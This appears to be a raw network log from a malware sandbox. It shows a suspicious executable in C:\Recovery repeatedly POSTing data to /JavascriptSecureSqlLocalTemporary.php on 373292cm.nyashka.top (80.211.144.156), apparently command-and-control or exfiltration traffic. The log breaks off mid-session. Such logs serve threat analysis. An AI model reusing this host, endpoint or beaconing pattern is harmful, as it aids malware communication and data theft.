                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:44:03.924252987 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:04.058253050 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:03 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    39 | 192.168.2.6 | 49764 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:44:04.188342094 CEST | 293 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:44:04.859798908 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:04.995398998 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:04 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    40 | 192.168.2.6 | 49765 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:44:05.124339104 CEST | 293 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:44:05.788036108 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:05.922456980 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:05 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    41 | 192.168.2.6 | 49766 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:44:06.057090044 CEST | 293 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:44:06.721429110 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:06.918792009 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:06 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    42 | 192.168.2.6 | 49767 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:44:06.973325968 CEST | 293 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 1840
                                    Expect: 100-continue
                                    Connection: Keep-Alive


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    43 | 192.168.2.6 | 49768 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:44:07.046091080 CEST | 293 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:44:07.722455025 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:07.925570011 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:07 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    44 | 192.168.2.6 | 49769 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:44:08.483916044 CEST | 269 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Aug 25, 2024 15:44:09.165605068 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:09.299252987 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:08 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    45 | 192.168.2.6 | 49770 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:44:09.424556971 CEST | 269 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Aug 25, 2024 15:44:10.102471113 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:10.251214027 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:09 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    46 | 192.168.2.6 | 49771 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:44:10.382642984 CEST | 293 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:44:11.059572935 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:11.193948984 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:10 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    47 | 192.168.2.6 | 49772 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:44:11.314769030 CEST | 293 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:44:11.979078054 CEST | 25 | IN | HTTP/1.1 100 Continue


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    48 | 192.168.2.6 | 49773 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:44:12.051295996 CEST | 293 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 1840
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:44:12.404232025 CEST | 1840 | OUT
                                    Aug 25, 2024 15:44:12.745075941 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:12.883660078 CEST | 308 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:12 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 152
                                    Connection: keep-alive


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    49 | 192.168.2.6 | 49774 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:44:12.203104019 CEST | 293 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:44:12.563148022 CEST | 2516 | OUT
                                    Aug 25, 2024 15:44:12.864228964 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:12.997497082 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:12 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    50 | 192.168.2.6 | 49776 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:44:13.127667904 CEST | 269 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Aug 25, 2024 15:44:13.486105919 CEST | 2516 | OUT
                                    Aug 25, 2024 15:44:13.794229031 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:13.949173927 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:13 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    51 | 192.168.2.6 | 49777 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:44:14.078092098 CEST | 293 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:44:14.435457945 CEST | 2516 | OUT
                                    Aug 25, 2024 15:44:14.814344883 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:14.943761110 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:14 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    52 | 192.168.2.6 | 49778 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:44:15.080034971 CEST | 293 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:44:15.435611010 CEST | 2516 | OUT
                                    Aug 25, 2024 15:44:15.750068903 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:15.882800102 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:15 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    53 | 192.168.2.6 | 49779 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:44:16.633265972 CEST | 293 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:44:16.982475042 CEST | 2516 | OUT
                                    Aug 25, 2024 15:44:17.338368893 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:17.471532106 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:16 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    54 | 192.168.2.6 | 49780 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:44:17.596431017 CEST | 293 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    55 | 192.168.2.6 | 49781 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:44:17.895472050 CEST | 293 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 1840
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:44:18.247993946 CEST | 1840 | OUT
                                    Aug 25, 2024 15:44:18.577860117 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:18.782084942 CEST | 308 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:18 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 152
                                    Connection: keep-alive


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    56 | 192.168.2.6 | 49782 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:44:18.015693903 CEST | 293 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:44:18.373075962 CEST | 2516 | OUT
                                    Aug 25, 2024 15:44:18.687629938 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:18.889750004 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:18 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    57 | 192.168.2.6 | 49783 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:44:19.081146955 CEST | 269 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Aug 25, 2024 15:44:19.435446978 CEST | 2516 | OUT
                                    Aug 25, 2024 15:44:19.772803068 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:19.976860046 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:19 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    58 | 192.168.2.6 | 49784 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:44:20.113158941 CEST | 269 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Aug 25, 2024 15:44:20.466770887 CEST | 2516 | OUT
                                    Aug 25, 2024 15:44:20.789216995 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:20.918942928 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:20 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    59 | 192.168.2.6 | 49785 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:44:21.047178984 CEST | 293 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:44:21.422295094 CEST | 2516 | OUT
                                    Aug 25, 2024 15:44:21.716005087 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:21.921788931 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:21 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    60 | 192.168.2.6 | 49787 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:44:22.047396898 CEST | 293 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:44:22.404309034 CEST | 2516 | OUT
                                    Aug 25, 2024 15:44:22.712323904 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:22.953212023 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:22 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    61 | 192.168.2.6 | 49788 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:44:23.082521915 CEST | 293 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:44:23.435571909 CEST | 2516 | OUT
                                    Aug 25, 2024 15:44:23.747426987 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:23.878122091 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:23 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    62 | 192.168.2.6 | 49789 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:44:23.892472982 CEST | 293 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 1820
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:44:24.248004913 CEST | 1820 | OUT
                                    Aug 25, 2024 15:44:24.589941978 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:24.721812963 CEST | 308 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:24 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 152
                                    Connection: keep-alive


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    63 | 192.168.2.6 | 49790 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:44:24.058505058 CEST | 293 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
Aug 25, 2024 15:44:24.404500961 CEST | 2516 | OUT | Data: [encoded payload]
Aug 25, 2024 15:44:24.704689026 CEST | 25 | IN | HTTP/1.1 100 Continue
Aug 25, 2024 15:44:24.838546038 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:24 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
64 | 192.168.2.6 | 49791 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
Timestamp | Bytes transferred | Direction | Data
Aug 25, 2024 15:44:24.970091105 CEST | 269 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2512
                                    Expect: 100-continue
Aug 25, 2024 15:44:25.326481104 CEST | 2512 | OUT | Data: [encoded payload]
Aug 25, 2024 15:44:25.659655094 CEST | 25 | IN | HTTP/1.1 100 Continue
Aug 25, 2024 15:44:25.770919085 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:25 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
65 | 192.168.2.6 | 49792 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
Timestamp | Bytes transferred | Direction | Data
Aug 25, 2024 15:44:25.960104942 CEST | 293 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
